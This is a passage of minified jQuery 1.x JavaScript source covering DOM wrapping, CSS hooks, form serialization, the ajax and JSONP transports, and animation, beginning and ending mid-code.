     6 +u[o]&&(delete u[o],c?delete n[l]:typeof n.removeAttribute!==i?n.removeAttribute(l):n[l]=null,p.push(o))}},_evalUrl:function(e){return x.ajax({url:e,type:"GET",dataType:"script",async:!1,global:!1,"throws":!0})}}),x.fn.extend({wrapAll:function(e){if(x.isFunction(e))return this.each(function(t){x(this).wrapAll(e.call(this,t))});if(this[0]){var t=x(e,this[0].ownerDocument).eq(0).clone(!0);this[0].parentNode&&t.insertBefore(this[0]),t.map(function(){var e=this;while(e.firstChild&&1===e.firstChild.nodeType)e=e.firstChild;return e}).append(this)}return this},wrapInner:function(e){return x.isFunction(e)?this.each(function(t){x(this).wrapInner(e.call(this,t))}):this.each(function(){var t=x(this),n=t.contents();n.length?n.wrapAll(e):t.append(e)})},wrap:function(e){var t=x.isFunction(e);return this.each(function(n){x(this).wrapAll(t?e.call(this,n):e)})},unwrap:function(){return this.parent().each(function(){x.nodeName(this,"body")||x(this).replaceWith(this.childNodes)}).end()}});var Pt,Rt,Wt,$t=/alpha\([^)]*\)/i,It=/opacity\s*=\s*([^)]*)/,zt=/^(top|right|bottom|left)$/,Xt=/^(none|table(?!-c[ea]).+)/,Ut=/^margin/,Vt=RegExp("^("+w+")(.*)$","i"),Yt=RegExp("^("+w+")(?!px)[a-z%]+$","i"),Jt=RegExp("^([+-])=("+w+")","i"),Gt={BODY:"block"},Qt={position:"absolute",visibility:"hidden",display:"block"},Kt={letterSpacing:0,fontWeight:400},Zt=["Top","Right","Bottom","Left"],en=["Webkit","O","Moz","ms"];function tn(e,t){if(t in e)return t;var n=t.charAt(0).toUpperCase()+t.slice(1),r=t,i=en.length;while(i--)if(t=en[i]+n,t in e)return t;return r}function nn(e,t){return e=t||e,"none"===x.css(e,"display")||!x.contains(e.ownerDocument,e)}function rn(e,t){var n,r,i,o=[],a=0,s=e.length;for(;s>a;a++)r=e[a],r.style&&(o[a]=x._data(r,"olddisplay"),n=r.style.display,t?(o[a]||"none"!==n||(r.style.display=""),""===r.style.display&&nn(r)&&(o[a]=x._data(r,"olddisplay",ln(r.nodeName)))):o[a]||(i=nn(r),(n&&"none"!==n||!i)&&x._data(r,"olddisplay",i?n:x.css(r,"display"))));for(a=0;s>a;a++)r=e[a],r.style&&(t&&"none"!==r.style.display&&""!==r.style.display||(r.style.display=t?o[a]||"":"none"));return e}x.fn.extend({css:function(e,n){return x.access(this,function(e,n,r){var i,o,a={},s=0;if(x.isArray(n)){for(o=Rt(e),i=n.length;i>s;s++)a[n[s]]=x.css(e,n[s],!1,o);return a}return r!==t?x.style(e,n,r):x.css(e,n)},e,n,arguments.length>1)},show:function(){return rn(this,!0)},hide:function(){return rn(this)},toggle:function(e){return"boolean"==typeof e?e?this.show():this.hide():this.each(function(){nn(this)?x(this).show():x(this).hide()})}}),x.extend({cssHooks:{opacity:{get:function(e,t){if(t){var n=Wt(e,"opacity");return""===n?"1":n}}}},cssNumber:{columnCount:!0,fillOpacity:!0,fontWeight:!0,lineHeight:!0,opacity:!0,order:!0,orphans:!0,widows:!0,zIndex:!0,zoom:!0},cssProps:{"float":x.support.cssFloat?"cssFloat":"styleFloat"},style:function(e,n,r,i){if(e&&3!==e.nodeType&&8!==e.nodeType&&e.style){var o,a,s,l=x.camelCase(n),u=e.style;if(n=x.cssProps[l]||(x.cssProps[l]=tn(u,l)),s=x.cssHooks[n]||x.cssHooks[l],r===t)return s&&"get"in s&&(o=s.get(e,!1,i))!==t?o:u[n];if(a=typeof r,"string"===a&&(o=Jt.exec(r))&&(r=(o[1]+1)*o[2]+parseFloat(x.css(e,n)),a="number"),!(null==r||"number"===a&&isNaN(r)||("number"!==a||x.cssNumber[l]||(r+="px"),x.support.clearCloneStyle||""!==r||0!==n.indexOf("background")||(u[n]="inherit"),s&&"set"in s&&(r=s.set(e,r,i))===t)))try{u[n]=r}catch(c){}}},css:function(e,n,r,i){var o,a,s,l=x.camelCase(n);return n=x.cssProps[l]||(x.cssProps[l]=tn(e.style,l)),s=x.cssHooks[n]||x.cssHooks[l],s&&"get"in s&&(a=s.get(e,!0,r)),a===t&&(a=Wt(e,n,i)),"normal"===a&&n in Kt&&(a=Kt[n]),""===r||r?(o=parseFloat(a),r===!0||x.isNumeric(o)?o||0:a):a}}),e.getComputedStyle?(Rt=function(t){return e.getComputedStyle(t,null)},Wt=function(e,n,r){var i,o,a,s=r||Rt(e),l=s?s.getPropertyValue(n)||s[n]:t,u=e.style;return s&&(""!==l||x.contains(e.ownerDocument,e)||(l=x.style(e,n)),Yt.test(l)&&Ut.test(n)&&(i=u.width,o=u.minWidth,a=u.maxWidth,u.minWidth=u.maxWidth=u.width=l,l=s.width,u.width=i,u.minWidth=o,u.maxWidth=a)),l}):a.documentElement.currentStyle&&(Rt=function(e){return e.currentStyle},Wt=function(e,n,r){var i,o,a,s=r||Rt(e),l=s?s[n]:t,u=e.style;return null==l&&u&&u[n]&&(l=u[n]),Yt.test(l)&&!zt.test(n)&&(i=u.left,o=e.runtimeStyle,a=o&&o.left,a&&(o.left=e.currentStyle.left),u.left="fontSize"===n?"1em":l,l=u.pixelLeft+"px",u.left=i,a&&(o.left=a)),""===l?"auto":l});function on(e,t,n){var r=Vt.exec(t);return r?Math.max(0,r[1]-(n||0))+(r[2]||"px"):t}function an(e,t,n,r,i){var o=n===(r?"border":"content")?4:"width"===t?1:0,a=0;for(;4>o;o+=2)"margin"===n&&(a+=x.css(e,n+Zt[o],!0,i)),r?("content"===n&&(a-=x.css(e,"padding"+Zt[o],!0,i)),"margin"!==n&&(a-=x.css(e,"border"+Zt[o]+"Width",!0,i))):(a+=x.css(e,"padding"+Zt[o],!0,i),"padding"!==n&&(a+=x.css(e,"border"+Zt[o]+"Width",!0,i)));return a}function sn(e,t,n){var r=!0,i="width"===t?e.offsetWidth:e.offsetHeight,o=Rt(e),a=x.support.boxSizing&&"border-box"===x.css(e,"boxSizing",!1,o);if(0>=i||null==i){if(i=Wt(e,t,o),(0>i||null==i)&&(i=e.style[t]),Yt.test(i))return i;r=a&&(x.support.boxSizingReliable||i===e.style[t]),i=parseFloat(i)||0}return i+an(e,t,n||(a?"border":"content"),r,o)+"px"}function ln(e){var t=a,n=Gt[e];return n||(n=un(e,t),"none"!==n&&n||(Pt=(Pt||x("<iframe frameborder='0' width='0' height='0'/>").css("cssText","display:block !important")).appendTo(t.documentElement),t=(Pt[0].contentWindow||Pt[0].contentDocument).document,t.write("<!doctype html><html><body>"),t.close(),n=un(e,t),Pt.detach()),Gt[e]=n),n}function un(e,t){var n=x(t.createElement(e)).appendTo(t.body),r=x.css(n[0],"display");return n.remove(),r}x.each(["height","width"],function(e,n){x.cssHooks[n]={get:function(e,r,i){return r?0===e.offsetWidth&&Xt.test(x.css(e,"display"))?x.swap(e,Qt,function(){return sn(e,n,i)}):sn(e,n,i):t},set:function(e,t,r){var i=r&&Rt(e);return on(e,t,r?an(e,n,r,x.support.boxSizing&&"border-box"===x.css(e,"boxSizing",!1,i),i):0)}}}),x.support.opacity||(x.cssHooks.opacity={get:function(e,t){return It.test((t&&e.currentStyle?e.currentStyle.filter:e.style.filter)||"")?.01*parseFloat(RegExp.$1)+"":t?"1":""},set:function(e,t){var n=e.style,r=e.currentStyle,i=x.isNumeric(t)?"alpha(opacity="+100*t+")":"",o=r&&r.filter||n.filter||"";n.zoom=1,(t>=1||""===t)&&""===x.trim(o.replace($t,""))&&n.removeAttribute&&(n.removeAttribute("filter"),""===t||r&&!r.filter)||(n.filter=$t.test(o)?o.replace($t,i):o+" "+i)}}),x(function(){x.support.reliableMarginRight||(x.cssHooks.marginRight={get:function(e,n){return n?x.swap(e,{display:"inline-block"},Wt,[e,"marginRight"]):t}}),!x.support.pixelPosition&&x.fn.position&&x.each(["top","left"],function(e,n){x.cssHooks[n]={get:function(e,r){return r?(r=Wt(e,n),Yt.test(r)?x(e).position()[n]+"px":r):t}}})}),x.expr&&x.expr.filters&&(x.expr.filters.hidden=function(e){return 0>=e.offsetWidth&&0>=e.offsetHeight||!x.support.reliableHiddenOffsets&&"none"===(e.style&&e.style.display||x.css(e,"display"))},x.expr.filters.visible=function(e){return!x.expr.filters.hidden(e)}),x.each({margin:"",padding:"",border:"Width"},function(e,t){x.cssHooks[e+t]={expand:function(n){var r=0,i={},o="string"==typeof n?n.split(" "):[n];for(;4>r;r++)i[e+Zt[r]+t]=o[r]||o[r-2]||o[0];return i}},Ut.test(e)||(x.cssHooks[e+t].set=on)});var cn=/%20/g,pn=/\[\]$/,fn=/\r?\n/g,dn=/^(?:submit|button|image|reset|file)$/i,hn=/^(?:input|select|textarea|keygen)/i;x.fn.extend({serialize:function(){return x.param(this.serializeArray())},serializeArray:function(){return this.map(function(){var e=x.prop(this,"elements");return e?x.makeArray(e):this}).filter(function(){var e=this.type;return this.name&&!x(this).is(":disabled")&&hn.test(this.nodeName)&&!dn.test(e)&&(this.checked||!Ct.test(e))}).map(function(e,t){var n=x(this).val();return null==n?null:x.isArray(n)?x.map(n,function(e){return{name:t.name,value:e.replace(fn,"\r\n")}}):{name:t.name,value:n.replace(fn,"\r\n")}}).get()}}),x.param=function(e,n){var r,i=[],o=function(e,t){t=x.isFunction(t)?t():null==t?"":t,i[i.length]=encodeURIComponent(e)+"="+encodeURIComponent(t)};if(n===t&&(n=x.ajaxSettings&&x.ajaxSettings.traditional),x.isArray(e)||e.jquery&&!x.isPlainObject(e))x.each(e,function(){o(this.name,this.value)});else for(r in e)gn(r,e[r],n,o);return i.join("&").replace(cn,"+")};function gn(e,t,n,r){var i;if(x.isArray(t))x.each(t,function(t,i){n||pn.test(e)?r(e,i):gn(e+"["+("object"==typeof i?t:"")+"]",i,n,r)});else if(n||"object"!==x.type(t))r(e,t);else for(i in t)gn(e+"["+i+"]",t[i],n,r)}x.each("blur focus focusin focusout load resize scroll unload click dblclick mousedown mouseup mousemove mouseover mouseout mouseenter mouseleave change select submit keydown keypress keyup error contextmenu".split(" "),function(e,t){x.fn[t]=function(e,n){return arguments.length>0?this.on(t,null,e,n):this.trigger(t)}}),x.fn.extend({hover:function(e,t){return this.mouseenter(e).mouseleave(t||e)},bind:function(e,t,n){return this.on(e,null,t,n)},unbind:function(e,t){return this.off(e,null,t)},delegate:function(e,t,n,r){return this.on(t,e,n,r)},undelegate:function(e,t,n){return 1===arguments.length?this.off(e,"**"):this.off(t,e||"**",n)}});var mn,yn,vn=x.now(),bn=/\?/,xn=/#.*$/,wn=/([?&])_=[^&]*/,Tn=/^(.*?):[ \t]*([^\r\n]*)\r?$/gm,Cn=/^(?:about|app|app-storage|.+-extension|file|res|widget):$/,Nn=/^(?:GET|HEAD)$/,kn=/^\/\//,En=/^([\w.+-]+:)(?:\/\/([^\/?#:]*)(?::(\d+)|)|)/,Sn=x.fn.load,An={},jn={},Dn="*/".concat("*");try{yn=o.href}catch(Ln){yn=a.createElement("a"),yn.href="",yn=yn.href}mn=En.exec(yn.toLowerCase())||[];function Hn(e){return function(t,n){"string"!=typeof t&&(n=t,t="*");var r,i=0,o=t.toLowerCase().match(T)||[];if(x.isFunction(n))while(r=o[i++])"+"===r[0]?(r=r.slice(1)||"*",(e[r]=e[r]||[]).unshift(n)):(e[r]=e[r]||[]).push(n)}}function qn(e,n,r,i){var o={},a=e===jn;function s(l){var u;return o[l]=!0,x.each(e[l]||[],function(e,l){var c=l(n,r,i);return"string"!=typeof c||a||o[c]?a?!(u=c):t:(n.dataTypes.unshift(c),s(c),!1)}),u}return s(n.dataTypes[0])||!o["*"]&&s("*")}function _n(e,n){var r,i,o=x.ajaxSettings.flatOptions||{};for(i in n)n[i]!==t&&((o[i]?e:r||(r={}))[i]=n[i]);return r&&x.extend(!0,e,r),e}x.fn.load=function(e,n,r){if("string"!=typeof e&&Sn)return Sn.apply(this,arguments);var i,o,a,s=this,l=e.indexOf(" ");return l>=0&&(i=e.slice(l,e.length),e=e.slice(0,l)),x.isFunction(n)?(r=n,n=t):n&&"object"==typeof n&&(a="POST"),s.length>0&&x.ajax({url:e,type:a,dataType:"html",data:n}).done(function(e){o=arguments,s.html(i?x("<div>").append(x.parseHTML(e)).find(i):e)}).complete(r&&function(e,t){s.each(r,o||[e.responseText,t,e])}),this},x.each(["ajaxStart","ajaxStop","ajaxComplete","ajaxError","ajaxSuccess","ajaxSend"],function(e,t){x.fn[t]=function(e){return this.on(t,e)}}),x.extend({active:0,lastModified:{},etag:{},ajaxSettings:{url:yn,type:"GET",isLocal:Cn.test(mn[1]),global:!0,processData:!0,async:!0,contentType:"application/x-www-form-urlencoded; charset=UTF-8",accepts:{"*":Dn,text:"text/plain",html:"text/html",xml:"application/xml, text/xml",json:"application/json, text/javascript"},contents:{xml:/xml/,html:/html/,json:/json/},responseFields:{xml:"responseXML",text:"responseText",json:"responseJSON"},converters:{"* text":String,"text html":!0,"text json":x.parseJSON,"text xml":x.parseXML},flatOptions:{url:!0,context:!0}},ajaxSetup:function(e,t){return t?_n(_n(e,x.ajaxSettings),t):_n(x.ajaxSettings,e)},ajaxPrefilter:Hn(An),ajaxTransport:Hn(jn),ajax:function(e,n){"object"==typeof e&&(n=e,e=t),n=n||{};var r,i,o,a,s,l,u,c,p=x.ajaxSetup({},n),f=p.context||p,d=p.context&&(f.nodeType||f.jquery)?x(f):x.event,h=x.Deferred(),g=x.Callbacks("once memory"),m=p.statusCode||{},y={},v={},b=0,w="canceled",C={readyState:0,getResponseHeader:function(e){var t;if(2===b){if(!c){c={};while(t=Tn.exec(a))c[t[1].toLowerCase()]=t[2]}t=c[e.toLowerCase()]}return null==t?null:t},getAllResponseHeaders:function(){return 2===b?a:null},setRequestHeader:function(e,t){var n=e.toLowerCase();return b||(e=v[n]=v[n]||e,y[e]=t),this},overrideMimeType:function(e){return b||(p.mimeType=e),this},statusCode:function(e){var t;if(e)if(2>b)for(t in e)m[t]=[m[t],e[t]];else C.always(e[C.status]);return this},abort:function(e){var t=e||w;return u&&u.abort(t),k(0,t),this}};if(h.promise(C).complete=g.add,C.success=C.done,C.error=C.fail,p.url=((e||p.url||yn)+"").replace(xn,"").replace(kn,mn[1]+"//"),p.type=n.method||n.type||p.method||p.type,p.dataTypes=x.trim(p.dataType||"*").toLowerCase().match(T)||[""],null==p.crossDomain&&(r=En.exec(p.url.toLowerCase()),p.crossDomain=!(!r||r[1]===mn[1]&&r[2]===mn[2]&&(r[3]||("http:"===r[1]?"80":"443"))===(mn[3]||("http:"===mn[1]?"80":"443")))),p.data&&p.processData&&"string"!=typeof p.data&&(p.data=x.param(p.data,p.traditional)),qn(An,p,n,C),2===b)return C;l=p.global,l&&0===x.active++&&x.event.trigger("ajaxStart"),p.type=p.type.toUpperCase(),p.hasContent=!Nn.test(p.type),o=p.url,p.hasContent||(p.data&&(o=p.url+=(bn.test(o)?"&":"?")+p.data,delete p.data),p.cache===!1&&(p.url=wn.test(o)?o.replace(wn,"$1_="+vn++):o+(bn.test(o)?"&":"?")+"_="+vn++)),p.ifModified&&(x.lastModified[o]&&C.setRequestHeader("If-Modified-Since",x.lastModified[o]),x.etag[o]&&C.setRequestHeader("If-None-Match",x.etag[o])),(p.data&&p.hasContent&&p.contentType!==!1||n.contentType)&&C.setRequestHeader("Content-Type",p.contentType),C.setRequestHeader("Accept",p.dataTypes[0]&&p.accepts[p.dataTypes[0]]?p.accepts[p.dataTypes[0]]+("*"!==p.dataTypes[0]?", "+Dn+"; q=0.01":""):p.accepts["*"]);for(i in p.headers)C.setRequestHeader(i,p.headers[i]);if(p.beforeSend&&(p.beforeSend.call(f,C,p)===!1||2===b))return C.abort();w="abort";for(i in{success:1,error:1,complete:1})C[i](p[i]);if(u=qn(jn,p,n,C)){C.readyState=1,l&&d.trigger("ajaxSend",[C,p]),p.async&&p.timeout>0&&(s=setTimeout(function(){C.abort("timeout")},p.timeout));try{b=1,u.send(y,k)}catch(N){if(!(2>b))throw N;k(-1,N)}}else k(-1,"No Transport");function k(e,n,r,i){var c,y,v,w,T,N=n;2!==b&&(b=2,s&&clearTimeout(s),u=t,a=i||"",C.readyState=e>0?4:0,c=e>=200&&300>e||304===e,r&&(w=Mn(p,C,r)),w=On(p,w,C,c),c?(p.ifModified&&(T=C.getResponseHeader("Last-Modified"),T&&(x.lastModified[o]=T),T=C.getResponseHeader("etag"),T&&(x.etag[o]=T)),204===e||"HEAD"===p.type?N="nocontent":304===e?N="notmodified":(N=w.state,y=w.data,v=w.error,c=!v)):(v=N,(e||!N)&&(N="error",0>e&&(e=0))),C.status=e,C.statusText=(n||N)+"",c?h.resolveWith(f,[y,N,C]):h.rejectWith(f,[C,N,v]),C.statusCode(m),m=t,l&&d.trigger(c?"ajaxSuccess":"ajaxError",[C,p,c?y:v]),g.fireWith(f,[C,N]),l&&(d.trigger("ajaxComplete",[C,p]),--x.active||x.event.trigger("ajaxStop")))}return C},getJSON:function(e,t,n){return x.get(e,t,n,"json")},getScript:function(e,n){return x.get(e,t,n,"script")}}),x.each(["get","post"],function(e,n){x[n]=function(e,r,i,o){return x.isFunction(r)&&(o=o||i,i=r,r=t),x.ajax({url:e,type:n,dataType:o,data:r,success:i})}});function Mn(e,n,r){var i,o,a,s,l=e.contents,u=e.dataTypes;while("*"===u[0])u.shift(),o===t&&(o=e.mimeType||n.getResponseHeader("Content-Type"));if(o)for(s in l)if(l[s]&&l[s].test(o)){u.unshift(s);break}if(u[0]in r)a=u[0];else{for(s in r){if(!u[0]||e.converters[s+" "+u[0]]){a=s;break}i||(i=s)}a=a||i}return a?(a!==u[0]&&u.unshift(a),r[a]):t}function On(e,t,n,r){var i,o,a,s,l,u={},c=e.dataTypes.slice();if(c[1])for(a in e.converters)u[a.toLowerCase()]=e.converters[a];o=c.shift();while(o)if(e.responseFields[o]&&(n[e.responseFields[o]]=t),!l&&r&&e.dataFilter&&(t=e.dataFilter(t,e.dataType)),l=o,o=c.shift())if("*"===o)o=l;else if("*"!==l&&l!==o){if(a=u[l+" "+o]||u["* "+o],!a)for(i in u)if(s=i.split(" "),s[1]===o&&(a=u[l+" "+s[0]]||u["* "+s[0]])){a===!0?a=u[i]:u[i]!==!0&&(o=s[0],c.unshift(s[1]));break}if(a!==!0)if(a&&e["throws"])t=a(t);else try{t=a(t)}catch(p){return{state:"parsererror",error:a?p:"No conversion from "+l+" to "+o}}}return{state:"success",data:t}}x.ajaxSetup({accepts:{script:"text/javascript, application/javascript, application/ecmascript, application/x-ecmascript"},contents:{script:/(?:java|ecma)script/},converters:{"text script":function(e){return x.globalEval(e),e}}}),x.ajaxPrefilter("script",function(e){e.cache===t&&(e.cache=!1),e.crossDomain&&(e.type="GET",e.global=!1)}),x.ajaxTransport("script",function(e){if(e.crossDomain){var n,r=a.head||x("head")[0]||a.documentElement;return{send:function(t,i){n=a.createElement("script"),n.async=!0,e.scriptCharset&&(n.charset=e.scriptCharset),n.src=e.url,n.onload=n.onreadystatechange=function(e,t){(t||!n.readyState||/loaded|complete/.test(n.readyState))&&(n.onload=n.onreadystatechange=null,n.parentNode&&n.parentNode.removeChild(n),n=null,t||i(200,"success"))},r.insertBefore(n,r.firstChild)},abort:function(){n&&n.onload(t,!0)}}}});var Fn=[],Bn=/(=)\?(?=&|$)|\?\?/;x.ajaxSetup({jsonp:"callback",jsonpCallback:function(){var e=Fn.pop()||x.expando+"_"+vn++;return this[e]=!0,e}}),x.ajaxPrefilter("json jsonp",function(n,r,i){var o,a,s,l=n.jsonp!==!1&&(Bn.test(n.url)?"url":"string"==typeof n.data&&!(n.contentType||"").indexOf("application/x-www-form-urlencoded")&&Bn.test(n.data)&&"data");return l||"jsonp"===n.dataTypes[0]?(o=n.jsonpCallback=x.isFunction(n.jsonpCallback)?n.jsonpCallback():n.jsonpCallback,l?n[l]=n[l].replace(Bn,"$1"+o):n.jsonp!==!1&&(n.url+=(bn.test(n.url)?"&":"?")+n.jsonp+"="+o),n.converters["script json"]=function(){return s||x.error(o+" was not called"),s[0]},n.dataTypes[0]="json",a=e[o],e[o]=function(){s=arguments},i.always(function(){e[o]=a,n[o]&&(n.jsonpCallback=r.jsonpCallback,Fn.push(o)),s&&x.isFunction(a)&&a(s[0]),s=a=t}),"script"):t});var Pn,Rn,Wn=0,$n=e.ActiveXObject&&function(){var e;for(e in Pn)Pn[e](t,!0)};function In(){try{return new e.XMLHttpRequest}catch(t){}}function zn(){try{return new e.ActiveXObject("Microsoft.XMLHTTP")}catch(t){}}x.ajaxSettings.xhr=e.ActiveXObject?function(){return!this.isLocal&&In()||zn()}:In,Rn=x.ajaxSettings.xhr(),x.support.cors=!!Rn&&"withCredentials"in Rn,Rn=x.support.ajax=!!Rn,Rn&&x.ajaxTransport(function(n){if(!n.crossDomain||x.support.cors){var r;return{send:function(i,o){var a,s,l=n.xhr();if(n.username?l.open(n.type,n.url,n.async,n.username,n.password):l.open(n.type,n.url,n.async),n.xhrFields)for(s in n.xhrFields)l[s]=n.xhrFields[s];n.mimeType&&l.overrideMimeType&&l.overrideMimeType(n.mimeType),n.crossDomain||i["X-Requested-With"]||(i["X-Requested-With"]="XMLHttpRequest");try{for(s in i)l.setRequestHeader(s,i[s])}catch(u){}l.send(n.hasContent&&n.data||null),r=function(e,i){var s,u,c,p;try{if(r&&(i||4===l.readyState))if(r=t,a&&(l.onreadystatechange=x.noop,$n&&delete Pn[a]),i)4!==l.readyState&&l.abort();else{p={},s=l.status,u=l.getAllResponseHeaders(),"string"==typeof l.responseText&&(p.text=l.responseText);try{c=l.statusText}catch(f){c=""}s||!n.isLocal||n.crossDomain?1223===s&&(s=204):s=p.text?200:404}}catch(d){i||o(-1,d)}p&&o(s,c,p,u)},n.async?4===l.readyState?setTimeout(r):(a=++Wn,$n&&(Pn||(Pn={},x(e).unload($n)),Pn[a]=r),l.onreadystatechange=r):r()},abort:function(){r&&r(t,!0)}}}});var Xn,Un,Vn=/^(?:toggle|show|hide)$/,Yn=RegExp("^(?:([+-])=|)("+w+")([a-z%]*)$","i"),Jn=/queueHooks$/,Gn=[nr],Qn={"*":[function(e,t){var n=this.createTween(e,t),r=n.cur(),i=Yn.exec(t),o=i&&i[3]||(x.cssNumber[e]?"":"px"),a=(x.cssNumber[e]||"px"!==o&&+r)&&Yn.exec(x.css(n.elem,e)),s=1,l=20;if(a&&a[3]!==o){o=o||a[3],i=i||[],a=+r||1;do s=s||".5",a/=s,x.style(n.elem,e,a+o);while(s!==(s=n.cur()/r)&&1!==s&&--l)}return i&&(a=n.start=+a||+r||0,n.unit=o,n.end=i[1]?a+(i[1]+1)*i[2]:+i[2]),n}]};function Kn(){return setTimeout(function(){Xn=t}),Xn=x.now()}function Zn(e,t,n){var r,i=(Qn[t]||[]).concat(Qn["*"]),o=0,a=i.length;for(;a>o;o++)if(r=i[o].call(n,t,e))return r}function er(e,t,n){var r,i,o=0,a=Gn.length,s=x.Deferred().always(function(){delete l.elem}),l=function(){if(i)return!1;var t=Xn||Kn(),n=Math.max(0,u.startTime+u.duration-t),r=n/u.duration||0,o=1-r,a=0,l=u.tweens.length;for(;l>a;a++)u.tweens[a].run(o);return s.notifyWith(e,[u,o,n]),1>o&&l?n:(s.resolveWith(e,[u]),!1)},u=s.promise({elem:e,props:x.extend({},t),opts:x.extend(!0,{specialEasing:{}},n),originalProperties:t,originalOptions:n,startTime:Xn||Kn(),duration:n.duration,tweens:[],createTween:function(t,n){var r=x.Tween(e,u.opts,t,n,u.opts.specialEasing[t]||u.opts.easing);return u.tweens.push(r),r},stop:function(t){var n=0,r=t?u.tweens.length:0;if(i)return this;for(i=!0;r>n;n++)u.tweens[n].run(1);return t?s.resolveWith(e,[u,t]):s.rejectWith(e,[u,t]),this}}),c=u.props;for(tr(c,u.opts.specialEasing);a>o;o++)if(r=Gn[o].call(u,e,c,u.opts))return r;return x.map(c,Zn,u),x.isFunction(u.opts.start)&&u.opts.start.call(e,u),x.fx.timer(x.extend(l,{elem:e,anim:u,queue:u.opts.queue})),u.progress(u.opts.progress).done(u.opts.done,u.opts.complete).fail(u.opts.fail).always(u.opts.always)}function tr(e,t){var n,r,i,o,a;for(n in e)if(r=x.camelCase(n),i=t[r],o=e[n],x.isArray(o)&&(i=o[1],o=e[n]=o[0]),n!==r&&(e[r]=o,delete e[n]),a=x.cssHooks[r],a&&"expand"in a){o=a.expand(o),delete e[r];for(n in o)n in e||(e[n]=o[n],t[n]=i)}else t[r]=i}x.Animation=x.extend(er,{tweener:function(e,t){x.isFunction(e)?(t=e,e=["*"]):e=e.split(" ");var n,r=0,i=e.length;for(;i>r;r++)n=e[r],Qn[n]=Qn[n]||[],Qn[n].unshift(t)},prefilter:function(e,t){t?Gn.unshift(e):Gn.push(e)}});function nr(e,t,n){var r,i,o,a,s,l,u=this,c={},p=e.style,f=e.nodeType&&nn(e),d=x._data(e,"fxshow");n.queue||(s=x._queueHooks(e,"fx"),null==s.unqueued&&(s.unqueued=0,l=s.empty.fire,s.empty.fire=function(){s.unqueued||l()}),s.unqueued++,u.always(function(){u.always(function(){s.unqueued--,x.queue(e,"fx").length||s.empty.fire()})})),1===e.nodeType&&("height"in t||"width"in t)&&(n.overflow=[p.overflow,p.overflowX,p.overflowY],"inline"===x.css(e,"display")&&"none"===x.css(e,"float")&&(x.support.inlineBlockNeedsLayout&&"inline"!==ln(e.nodeName)?p.zoom=1:p.display="inline-block")),n.overflow&&(p.overflow="hidden",x.support.shrinkWrapBlocks||u.always(function(){p.overflow=n.overflow[0],p.overflowX=n.overflow[1],p.overflowY=n.overflow[2]}));for(r in t)if(i=t[r],Vn.exec(i)){if(delete t[r],o=o||"toggle"===i,i===(f?"hide":"show"))continue;c[r]=d&&d[r]||x.style(e,r)}if(!x.isEmptyObject(c)){d?"hidden"in d&&(f=d.hidden):d=x._data(e,"fxshow",{}),o&&(d.hidden=!f),f?x(e).show():u.done(function(){x(e).hide()}),u.done(function(){var t;x._removeData(e,"fxshow");for(t in c)x.style(e,t,c[t])});for(r in c)a=Zn(f?d[r]:0,r,u),r in d||(d[r]=a.start,f&&(a.end=a.start,a.start="width"===r||"height"===r?1:0))}}function rr(e,t,n,r,i){return new rr.prototype.init(e,t,n,r,i)}x.Tween=rr,rr.prototype={constructor:rr,init:function(e,t,n,r,i,o){this.elem=e,this.prop=n,this.easing=i||"swing",this.options=t,this.start=this.now=this.cur(),this.end=r,this.unit=o||(x.cssNumber[n]?"":"px")},cur:function(){var e=rr.propHooks[this.prop];return e&&e.get?e.get(this):rr.propHooks._default.get(this)},run:function(e){var t,n=rr.propHooks[this.prop];return this.pos=t=this.options.duration?x.easing[this.easing](e,this.options.duration*e,0,1,this.options.duration):e,this.now=(this.end-this.start)*t+this.start,this.options.step&&this.options.step.call(this.elem,this.now,this),n&&n.set?n.set(this):rr.propHooks._default.set(this),this}},rr.prototype.init.prototype=rr.prototype,rr.propHooks={_default:{get:function(e){var t;return null==e.elem[e.prop]||e.elem.style&&null!=e.elem.style[e.prop]?(t=x.css(e.elem,e.prop,""),t&&"auto"!==t?t:0):e.elem[e.prop]},set:function(e){x.fx.step[e.prop]?x.fx.step[e.prop](e):e.elem.style&&(null!=e.elem.style[x.cssProps[e.prop]]||x.cssHooks[e.prop])?x.style(e.elem,e.prop,e.now+e.unit):e.elem[e.prop]=e.now}}},rr.propHooks.scrollTop=rr.propHooks.scrollLeft={set:function(e){e.elem.nodeType&&e.elem.parentNode&&(e.elem[e.prop]=e.now)}},x.each(["toggle","show","hide"],function(e,t){var n=x.fn[t];x.fn[t]=function(e,r,i){return null==e||"boolean"==typeof e?n.apply(this,arguments):this.animate(ir(t,!0),e,r,i)}}),x.fn.extend({fadeTo:function(e,t,n,r){return this.filter(nn).css("opacity",0).show().end().animate({opacity:t},e,n,r)},animate:function(e,t,n,r){var i=x.isEmptyObject(e),o=x.speed(t,n,r),a=function(){var t=er(this,x.extend({},e),o);(i||x._data(this,"finish"))&&t.stop(!0)};return a.finish=a,i||o.queue===!1?this.each(a):this.queue(o.queue,a)},stop:function(e,n,r){var i=function(e){var t=e.stop;delete e.stop,t(r)};return"string"!=typeof e&&(r=n,n=e,e=t),n&&e!==!1&&this.queue(e||"fx",[]),this.each(function(){var t=!0,n=null!=e&&e+"queueHooks",o=x.timers,a=x._data(this);if(n)a[n]&&a[n].stop&&i(a[n]);else for(n in a)a[n]&&a[n].stop&&Jn.test(n)&&i(a[n]);for(n=o.length;n--;)o[n].elem!==this||null!=e&&o[n].queue!==e||(o[n].anim.stop(r),t=!1,o.splice(n,1));(t||!r)&&x.dequeue(this,e)})},finish:function(e){return e!==!1&&(e=e||"fx"),this.each(function(){var t,n=x._data(this),r=n[e+"queue"],i=n[e+"queueHooks"],o=x.timers,a=r?r.length:0;for(n.finish=!0,x.queue(this,e,[]),i&&i.stop&&i.stop.call(this,!0),t=o.length;t--;)o[t].elem===this&&o[t].queue===e&&(o[t].anim.stop(!0),o.splice(t,1));for(t=0;a>t;t++)r[t]&&r[t].finish&&r[t].finish.call(this);delete n.finish})}});function ir(e,t){var n,r={height:e},i=0;for(t=t?1:0;4>i;i+=2-t)n=Zt[i],r["margin"+n]=r["padding"+n]=e;return t&&(r.opacity=r.width=e),r}x.each({slideDown:ir("show"),slideUp:ir("hide"),slideToggle:ir("toggle"),fadeIn:{opacity:"show"},fadeOut:{opacity:"hide"},fadeToggle:{opacity:"toggle"}},function(e,t){x.fn[e]=function(e,n,r){return this.animate(t,e,n,r)}}),x.speed=function(e,t,n){var r=e&&"object"==typeof e?x.extend({},e):{complete:n||!n&&t||x.isFunction(e)&&e,duration:e,easing:n&&t||t&&!x.isFunction(t)&&t};return r.duration=x.fx.off?0:"number"==typeof r.duration?r.duration:r.duration in 